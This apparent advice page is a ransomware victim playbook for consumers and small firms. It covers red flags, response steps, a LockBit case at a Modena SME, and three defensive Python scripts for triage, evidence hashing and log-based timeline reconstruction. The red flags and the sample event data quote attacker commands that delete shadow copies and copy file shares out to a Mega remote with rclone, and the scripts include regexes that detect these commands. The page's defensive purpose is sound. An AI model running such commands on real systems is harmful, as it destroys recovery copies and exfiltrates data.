Cyber Coach

Ransomware: victim playbook for consumers and SMEs

Your files are encrypted and every folder holds a README with instructions in English. What to do in the first 60 minutes and in the following 72 hours.


Red flags to recognize

  • Files renamed with a new extension (.locked, .encrypted, .lockbit, .akira, .blackcat); some strains append a random extension instead, so the absence of a recognisable one proves nothing
  • A ransom note (README, Restore-My-Files, How-To-Decrypt or similar) in every folder, with Bitcoin or Monero payment instructions and a Tor contact address
  • Desktop wallpaper replaced by a countdown
  • Network backups inaccessible: modern ransomware encrypts or deletes every backup it can reach before detonating, which is why only offline or immutable copies survive
  • Windows Defender disabled and Volume Shadow Copies deleted (typically with vssadmin delete shadows /all /quiet) so that local restore is impossible
  • Your company listed on the group's Tor leak site with a threat to publish exfiltrated data (double extortion)
  • Lateral movement: many workstations and servers encrypted within the same minutes, which usually means the attacker held domain-level credentials before detonation
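
A first-hour triage script that turns the red flags above into something you can run on a suspect share or workstation. This is an added example written for this page, not tooling from Cyber Coach or Mythos: it walks a directory, flags files whose content is high-entropy (encrypted data looks random) grouped by their new extension, finds ransom notes by filename, and pulls strain keywords, .onion contacts and wallet addresses out of the notes. The note filename patterns, the strain keyword map and the sample tree it builds are assumptions made for the example.

```python
"""Ransomware triage over a directory tree.

Added illustrative example, not part of the Cyber Coach playbook. It flags
high-entropy files with unfamiliar extensions, locates ransom notes by filename,
and pulls strain hints, .onion contacts and wallet addresses from the notes.
The strain keyword map, the note filename patterns and the sample tree are
assumptions made for this example.
"""
import math
import os
import re
import tempfile
from collections import Counter

# Filename fragments common in ransom notes (assumed list, not exhaustive)
NOTE_RE = re.compile(r"(readme|restore|recover|decrypt|how[_ -]?to|help).*\.(txt|html|hta)$",
                     re.IGNORECASE)
# Keywords that hint at a strain (assumed mapping; extend it from your own cases)
STRAIN_HINTS = {"lockbit": "LockBit", "akira": "Akira",
                "alphv": "BlackCat/ALPHV", "blackcat": "BlackCat/ALPHV"}
ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b", re.IGNORECASE)
BTC_RE = re.compile(r"\b(?:bc1[a-z0-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\b")
XMR_RE = re.compile(r"\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ciphertext approaches 8.0, documents and text sit far lower."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage(root: str, entropy_threshold: float = 7.5, sample_bytes: int = 65536) -> dict:
    """Walk `root`; return ransom notes, high-entropy files, extension counts and IOCs."""
    report = {"notes": [], "high_entropy": [], "extensions": Counter(),
              "strain_hints": set(), "onion": set(), "btc": set(), "xmr": set()}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if NOTE_RE.search(name):
                report["notes"].append(path)
                with open(path, "rb") as fh:
                    text = fh.read().decode("utf-8", "replace")
                low = text.lower()
                report["strain_hints"].update(v for k, v in STRAIN_HINTS.items() if k in low)
                report["onion"].update(ONION_RE.findall(text))
                report["btc"].update(BTC_RE.findall(text))
                report["xmr"].update(XMR_RE.findall(text))
                continue
            with open(path, "rb") as fh:
                sample = fh.read(sample_bytes)
            # Tiny files give unreliable entropy estimates, so require a minimum size
            if len(sample) >= 256 and shannon_entropy(sample) >= entropy_threshold:
                ext = os.path.splitext(name)[1].lower()
                report["high_entropy"].append(path)
                report["extensions"][ext] += 1
                report["strain_hints"].update(v for k, v in STRAIN_HINTS.items() if k in ext)
    return report


def build_sample_tree() -> str:
    """Create a constructed victim tree in a temp dir (synthetic data, not a real case)."""
    root = tempfile.mkdtemp(prefix="ransom_triage_")
    finance = os.path.join(root, "Finance")
    os.makedirs(finance)
    for name in ("budget.xlsx.lockbit", "contracts.docx.lockbit"):
        with open(os.path.join(finance, name), "wb") as fh:
            fh.write(os.urandom(4096))  # random bytes stand in for ciphertext
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("Quarterly planning notes, untouched plaintext.\n" * 20)
    note = ("~~~ LockBit 3.0 ~~~\nYour files are stolen and encrypted.\n"
            "Contact: http://example7lockbit2leaksite.onion (constructed address)\n"
            "Pay in Bitcoin to bc1qexample" + "0" * 30 + " (constructed address)\n")
    with open(os.path.join(finance, "Restore-My-Files.txt"), "w") as fh:
        fh.write(note)
    return root


if __name__ == "__main__":
    r = triage(build_sample_tree())
    print(f"ransom notes: {len(r['notes'])}, encrypted-looking files: {len(r['high_entropy'])}")
    print("extensions:", dict(r["extensions"]), "strain hints:", sorted(r["strain_hints"]))
    print("onion:", sorted(r["onion"]), "btc:", sorted(r["btc"]))
```

Read the extension counts together with the entropy hits: archives, images and PDFs are high-entropy by nature, so a single flagged .zip means nothing, while hundreds of flagged files sharing one new extension is the encryption you are looking for. Keep the identified note and one sample encrypted file for the No More Ransom check.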

What to do now

  • Disconnect infected devices from the network (unplug the cable, switch off Wi-Fi) but do not power them off: RAM holds the running processes, live network connections and sometimes the encryption keys, and all of it is lost at shutdown
  • Do not pay the ransom: you finance criminals, there is no guarantee the decryptor works, exfiltrated data is rarely deleted, and paying a sanctioned group can itself be an offence
  • Check No More Ransom (nomoreransom.org): upload a sample encrypted file and the ransom note to Crypto Sheriff to identify the strain and see whether a free decryptor exists
  • Preserve volatile memory and logs: a memory image of one infected host, the Windows Security and System event logs, firewall, VPN and RDP gateway logs, and EDR telemetry are what forensics and attribution depend on; hash everything you collect and record who collected it and when
  • Contact your national CSIRT
  • If personal data is involved, notify the data protection authority within 72 hours of becoming aware of the breach (GDPR art. 33) and document the incident even if you conclude that notification is not required
  • Notify clients, suppliers and your cyber-insurer as your contractual obligations require
  • Restore from a clean offline backup only after full remediation: close the entry point, reset every credential including service and admin accounts, rebuild rather than clean compromised hosts, and verify that the backup itself is neither encrypted nor backdoored, otherwise you will be re-encrypted within days
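
The evidence-preservation step above, and the chain of custody the "What Mythos can do" list refers to, both come down to the same record: what was collected, by whom, when, and a hash that proves it has not changed since. This is an added example written for this page, not the playbook's or Mythos's tooling: it streams SHA-256 over each artefact, writes a manifest, seals the manifest with its own hash, and can later re-verify both the artefacts and the record. The case ID, collector name and the sample artefacts are constructed.

```python
"""Evidence manifest with SHA-256 hashes for chain of custody.

Added illustrative example, not tooling from the playbook or from Mythos. The
case ID, the collector name and the sample evidence files are constructed.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone


def sha256_file(path: str, chunk: int = 1 << 20) -> str:
    """Stream the file so multi-GB memory images and EVTX files hash without loading fully."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def _seal(manifest: dict) -> str:
    """Hash of the manifest record itself, excluding the seal field."""
    body = {k: v for k, v in manifest.items() if k != "manifest_sha256"}
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()


def build_manifest(paths, case_id: str, collector: str) -> dict:
    """Record path, size, filesystem mtime, SHA-256 and collection time for each item,
    then seal the record so that later edits to the manifest are detectable."""
    items = []
    for p in paths:
        st = os.stat(p)
        items.append({"path": os.path.abspath(p), "size": st.st_size,
                      "mtime_utc": datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat(),
                      "sha256": sha256_file(p)})
    manifest = {"case_id": case_id, "collector": collector,
                "collected_utc": datetime.now(timezone.utc).isoformat(), "items": items}
    manifest["manifest_sha256"] = _seal(manifest)
    return manifest


def manifest_intact(manifest: dict) -> bool:
    """True if the manifest record has not been edited since it was sealed."""
    return _seal(manifest) == manifest.get("manifest_sha256")


def verify_evidence(manifest: dict) -> list:
    """Paths whose current hash differs from the recorded one, or that are missing."""
    return [it["path"] for it in manifest["items"]
            if not os.path.isfile(it["path"]) or sha256_file(it["path"]) != it["sha256"]]


def build_sample_evidence() -> list:
    """Constructed stand-ins for collected artefacts (contents are synthetic)."""
    d = tempfile.mkdtemp(prefix="evidence_")
    samples = {"Security.evtx": os.urandom(2048),
               "Restore-My-Files.txt": b"Your files are encrypted. Contact us on Tor.\n",
               "WS-PROD-07.mem": os.urandom(4096)}
    paths = []
    for name, content in samples.items():
        p = os.path.join(d, name)
        with open(p, "wb") as fh:
            fh.write(content)
        paths.append(p)
    return paths


if __name__ == "__main__":
    m = build_manifest(build_sample_evidence(), case_id="IR-2025-0001", collector="j.doe")
    print(json.dumps(m, indent=2))
    print("manifest intact:", manifest_intact(m), "tampered items:", verify_evidence(m))
```

Keep the manifest on a medium separate from the evidence itself and send its hash to the CSIRT or your lawyer as soon as it is produced; a seal you only hold yourself proves little in court. Disk images should be taken through a write blocker or from a read-only mount so the hashes you record are the hashes the original carries.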

Real case

LockBit ransomware at a manufacturing SME, Emilia-Romagna, 2025

A metalworking SME in Modena with 42 employees arrives on Monday morning to find 78 encrypted PCs. The ransom note, in English, demands 320,000 USD in Bitcoin within 72 hours; otherwise 240 GB of exfiltrated data will be posted on the LockBit Tor leak site.

The CEO does not pay. He engages the CSIRT, notifies the data protection authority and informs clients. Mythos analyses a forensic image of one endpoint: the entry point is an RDP service exposed to the Internet without MFA, accessed with credentials leaked in a 2023 breach and never changed since. Lateral movement follows Active Directory enumeration with BloodHound; exfiltration goes through Rclone to a Mega account.

The SME restores production in 14 days from its offline backup. The exfiltrated data is published anyway. Mythos produces the dossier for the criminal complaint, supports the GDPR notification, and reconstructs the technical timeline for the lawsuit against the IT vendors responsible for the backups. No More Ransom confirms that no decryptor is available for the variant used.
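
The reconstruction in this case (brute-forced RDP from outside, network logons by the same account on other hosts, then Rclone) is a pattern you can pull out of Windows Security logs yourself before any vendor arrives. The script below is an added example written for this page and is not the analysis Mythos performed: it assumes the event records have already been exported into plain dicts (time, host, event ID, account, source IP, logon type, process, command line) and runs them through the rules an analyst would apply. The sample records are constructed and use documentation IP ranges; the corporate address ranges and the list of exfiltration tools are assumptions.

```python
"""Reconstruct entry point, lateral movement and exfiltration from Windows Security events.

Added illustrative example, not the analysis Mythos performed on this case.
Records are assumed to be exported from Security logs into plain dicts; the
sample records are constructed and use documentation IP ranges (203.0.113.0/24).
Note: 4688 only carries the command line if process-creation auditing is
configured with "Include command line in process creation events".
"""
import ipaddress
import re

# Assumed corporate address space: anything outside it is treated as external
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Assumed list of tools seen moving data out; extend from your own cases
EXFIL_TOOLS = re.compile(r"(rclone|megasync|megacmd|winscp|filezilla)\.exe$", re.IGNORECASE)
SHADOW_RE = re.compile(r"vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete", re.IGNORECASE)


def _ev(time, host, eid, user, ip="-", logon_type=None, process="", cmdline=""):
    """Build one exported event record (constructed helper for the sample)."""
    return {"time": time, "host": host, "id": eid, "user": user, "ip": ip,
            "logon_type": logon_type, "process": process, "cmdline": cmdline}


# Constructed sample: three failed RDP logons, one success, two network logons by the
# same account, a benign service-account logon, Rclone, and shadow-copy deletion.
SAMPLE_EVENTS = [
    _ev("2025-03-15T02:11:04Z", "SRV-TS01", 4625, "m.rossi", "203.0.113.45", 10),
    _ev("2025-03-15T02:11:09Z", "SRV-TS01", 4625, "m.rossi", "203.0.113.45", 10),
    _ev("2025-03-15T02:11:15Z", "SRV-TS01", 4625, "m.rossi", "203.0.113.45", 10),
    _ev("2025-03-15T02:14:30Z", "SRV-TS01", 4624, "m.rossi", "203.0.113.45", 10),
    _ev("2025-03-15T02:40:12Z", "WS-PROD-07", 4624, "m.rossi", "10.0.0.5", 3),
    _ev("2025-03-15T03:05:50Z", "SRV-FILE01", 4624, "m.rossi", "10.0.0.5", 3),
    _ev("2025-03-15T03:06:10Z", "SRV-FILE01", 4624, "svc-backup", "10.0.0.9", 3),
    _ev("2025-03-15T03:20:01Z", "SRV-FILE01", 4688, "m.rossi", process=r"C:\Temp\rclone.exe",
        cmdline=r"rclone.exe copy D:\Shares mega:exfil -q"),
    _ev("2025-03-15T08:02:00Z", "SRV-TS01", 4624, "l.bianchi", "10.0.0.22", 10),
    _ev("2025-03-17T01:00:00Z", "SRV-FILE01", 4688, "m.rossi", process=r"C:\Windows\System32\vssadmin.exe",
        cmdline="vssadmin delete shadows /all /quiet"),
]


def is_external(ip: str) -> bool:
    """True for addresses outside the assumed corporate ranges; '-' and garbage are not external."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return not (addr.is_loopback or any(addr in net for net in INTERNAL_NETS))


def reconstruct(events) -> dict:
    """Apply the analyst's rules in time order.
    4625 from outside = brute force; first 4624 logon type 10 (RDP) from outside = initial
    access; later 4624 logon type 3 (network) by that account = lateral movement;
    4688 of an exfil tool = exfiltration; 4688 deleting shadow copies = pre-encryption step."""
    report = {"brute_force": {}, "initial_access": None, "lateral": [], "exfil": [], "shadow_deletion": []}
    for e in sorted(events, key=lambda e: e["time"]):
        if e["id"] == 4625 and is_external(e["ip"]):
            key = (e["ip"], e["user"])
            report["brute_force"][key] = report["brute_force"].get(key, 0) + 1
        elif e["id"] == 4624 and e["logon_type"] == 10 and is_external(e["ip"]):
            if report["initial_access"] is None:
                report["initial_access"] = e
        elif (e["id"] == 4624 and e["logon_type"] == 3 and report["initial_access"]
              and e["user"] == report["initial_access"]["user"]):
            report["lateral"].append(e)
        elif e["id"] == 4688:
            if EXFIL_TOOLS.search(e["process"]):
                report["exfil"].append(e)
            if SHADOW_RE.search(e["cmdline"]):
                report["shadow_deletion"].append(e)
    return report


def timeline(report: dict) -> list:
    """Human-readable lines for the incident dossier."""
    lines = [f"{n} failed RDP logons for {user} from {ip}" for (ip, user), n in report["brute_force"].items()]
    ia = report["initial_access"]
    if ia:
        lines.append(f"{ia['time']} initial access: RDP logon {ia['user']} from {ia['ip']} on {ia['host']}")
    lines += [f"{e['time']} lateral movement: {e['user']} network logon to {e['host']} from {e['ip']}"
              for e in report["lateral"]]
    lines += [f"{e['time']} exfiltration tool on {e['host']}: {e['cmdline']}" for e in report["exfil"]]
    lines += [f"{e['time']} shadow copies deleted on {e['host']}: {e['cmdline']}" for e in report["shadow_deletion"]]
    return lines


if __name__ == "__main__":
    for line in timeline(reconstruct(SAMPLE_EVENTS)):
        print(line)
```

The rules are deliberately narrow: logon type 10 from an external address is the RDP-without-MFA entry point this case turned on, and a type 3 logon by the same account on another host is the cheapest lateral-movement signal available without EDR. The same export and rules work on the VPN-gateway or firewall logs if the entry was elsewhere; only the filters change.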

What Mythos can do on this case

  • Ransomware-strain identification from the encrypted files and the ransom note
  • Decryptor availability check on No More Ransom
  • Entry-point analysis (exposed RDP or VPN, phishing, unpatched vulnerabilities)
  • Lateral movement and exfiltration reconstruction from host and network logs
  • Dossier for the CSIRT and data-protection-authority notifications and for the insurance claim
  • Forensic chain of custody for potential civil or criminal action

Next steps